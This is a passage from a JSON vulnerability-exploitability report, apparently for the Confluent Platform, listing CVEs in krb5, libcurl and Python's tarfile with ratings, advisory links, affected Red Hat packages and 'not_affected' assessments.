      "description": "An integer underflow vulnerability was found in MIT krb5 in the berval2tl_data() function in plugins/kdb/ldap/libkdb_ldap/ldap_principal2.c. The function performs an unsigned subtraction (bv_len - 2) without a prior bounds check. When bv_len is 0 or 1, the subtraction wraps to a large value which is then truncated to uint16_t, yielding 0xFFFE (65534) or 0xFFFF (65535). The subsequent malloc succeeds and memcpy reads up to 65534 bytes from a 0-1 byte buffer, resulting in a heap out-of-bounds read.\nThe attack vector involves a malicious or compromised LDAP KDB backend returning a krbExtraData attribute with bv_len < 2, triggering the underflow when the KDC or kadmind reads principal data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11850"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:25520"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11850"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2459970"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11850"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8585-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11850"
        }
      ],
      "published": "2026-06-11T10:16:21+00:00",
      "updated": "2026-06-17T10:14:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/krb5-workstation@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libkadm5@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/krb5-libs@1.21.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11856",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        294
      ],
      "description": "Successfully using libcurl to do a transfer to a specific HTTP origin\n(`hostA`) with **Digest** authentication and then changing the origin to a\ndifferent one (`hostB`) for a second transfer, reusing the same handle, makes\nlibcurl wrongly pass on the  `Authorization:` header field meant for `hostA`,\nto `hostB`.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11856"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11856"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11856.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-11856.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-9crq-qh8v-6xmm"
        },
        {
          "url": "https://hackerone.com/reports/3793260"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11856"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11856"
        }
      ],
      "published": "2026-07-03T07:16:23+00:00",
      "updated": "2026-07-07T19:43:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-11940",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.3,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        22,
        59
      ],
      "description": "tarfile.extractall() with the 'data' or 'tar'\n filter could be bypassed by a crafted archive where a hardlink \nreferences a symlink stored at a deeper name than the hardlink itself.\u00a0 \nThe extraction fallback validated the symlink at it's archived location \nbut recreated it at the hardlink's shallower\npath, letting a relative\n target the filter judged contained escape the destination directory.\u00a0 \nThis allowed a malicious tar archive to create a symlink pointing \noutside the destination, enabling out-of-destination file reads or \nwrites. This was an incomplete fix of CVE-2025-4330.",
      "recommendation": "Upgrade python-unversioned-command to version 3.9.25-7.el9_8.3; Upgrade python3 to version 3.9.25-7.el9_8.3; Upgrade python3-libs to version 3.9.25-7.el9_8.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-11940"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54268"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-11940"
        },
        {
          "url": "https://bugzilla.redhat.com/2491848"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491848"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-11940"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-54268.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:54268"
        },
        {
          "url": "https://github.com/python/cpython/commit/0f852b3f07dd8e71e40326a51c02afbf16a42cc5"
        },
        {
          "url": "https://github.com/python/cpython/commit/27dd970bf6b17ebca7c8ed486a40ab043ed7af8f"
        },
        {
          "url": "https://github.com/python/cpython/commit/672825e2f36a57e173959b0d9d409d4560dab8df"
        },
        {
          "url": "https://github.com/python/cpython/commit/771d12dda5140313db0ac550292987975651bbde"
        },
        {
          "url": "https://github.com/python/cpython/commit/79c06bd5c6afa3c440d50faf7ee1b147c8832b4c"
        },
        {
          "url": "https://github.com/python/cpython/commit/be13e86f6b9788a6f4d0419dffef72cbae5865c9"
        },
        {
          "url": "https://github.com/python/cpython/commit/e5fdbd8d5aa923bd9111b112ea73bd6ec7c47877"
        },
        {
          "url": "https://github.com/python/cpython/issues/151558"
        },
        {
          "url": "https://github.com/python/cpython/pull/151559"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-11940.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-54268.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/LD6QIISNQFQYOIEPJNEUIPV7S3V76FZH/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11940"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11940"
        }
      ],
      "published": "2026-06-23T17:16:40+00:00",
      "updated": "2026-08-13T01:16:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
